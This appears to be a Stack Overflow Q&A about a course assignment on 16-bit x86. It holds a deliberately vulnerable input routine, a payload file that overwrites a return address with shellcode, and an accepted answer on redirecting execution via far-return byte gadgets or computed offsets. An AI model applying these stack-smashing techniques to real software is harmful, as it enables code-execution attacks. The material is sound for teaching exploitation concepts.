# (Assembly 8086) How can I return from a function to a different segment?

Tags: assembly, stack, stack-overflow, x86-16

I got an assigment to write to programs. One which gets input from the user, using a function that allocates a string on the stack, and writes to it, one character at a time, until it gets an "Enter". And another program that uses the flaws of the first one, and through stack overflaw,  changes the return address of the function, and points it to a malicious code (which I wrote to the stack).

My problem is that the function doesn't return to the address which I put in the stack (in the StackSegment), but instead just goes to the address in the CodeSegment.
This is the function which gets the input: (the printStr func prints from the stack)

```
getStr PROC
push bp
mov bp, sp
add bp, 2

push ax
push dx
push di
push ds

sub sp, 10

mov di, sp
mov ah, 01
strToStack:
    int 21h
    cmp al, 0dh
    je endLoop
    mov byte ptr ss:[di], al
    inc di
jmp strToStack
endLoop:
mov byte ptr ss:[di], '$'

lea dx, new_line
mov ah, 09
int 21h

push ss
pop ds
push sp
call printStr

add sp, 10

pop ds
pop di
pop dx
pop ax
pop bp

ret
endp
```

This is the program that writes the malicious code to a text file, which I use for the first program:

```
.model small
.stack 100
.code
main proc
    push @data
    pop ds

    push ds
    push cs
    pop ds

    lea dx, implant
    mov ah, 09
    int 21h

    pop ds

    exit:
    mov ah, 4ch
    int 21h
endp
implant:
blank   db '@','@','@','@','@','@','@','@','@','@','@','@','@','@','@','@','@','@','@','@'
real_address    dd 0066h, 3182h
mov ah, 2
    mov dl, '@'
    loopy:
        int 21h
    jmp loopy
finish  db  0dh,'$'
end main
```

Comment: You can use a far return if you are allowed to modify the program then the return address will include the segment too.

Comment: To return from a far call you use a far return.

Answer (score 0, accepted):

If you're not allowed to modify the code then search for a 0CBh or 0CAh byte anywhere in the code segment. These are far return instructions, but they don't actually have used for that purpose by the code. You just need to find a byte with either of these values. Change the near return address of the function (a single 16-bit value on the stack) so it returns to that byte and following that on the stack put the offset and segment of your malicious code.

Note that 0CAh byte is the RET *imm16* form of a far return, which causes it to pop arguments off the stack. If you use this byte you may want to readjust the stack.

If you can't find a 0CBh/0CAh byte then if you know that the stack segment isn't too far from the code segment then you have another option. You can use the offset of your code on the stack relative to the code segment as the near return address.  So if the stack segment is at 3182h, the code segment is at 3040h (to pick a number at random), and your code is at offset 64h in the stack segment then your code is located at offset `(3182h - 3040h) * 16 + 64h = 1484h` in the code segment. In that case you would replace the return address with 1484h instead of 3182h:0066h.

If you neither of these option are available to you then I can't think any other obvious solutions. The other standard stack smashing techniques probably don't apply. Maybe [return oriented programming](http://en.wikipedia.org/wiki/Return-oriented_programming), but there's probably no standard library in your target executable and probably not a lot of code to borrow chucks from. (Although the later would imply that the stack segment should to far from the code segment.)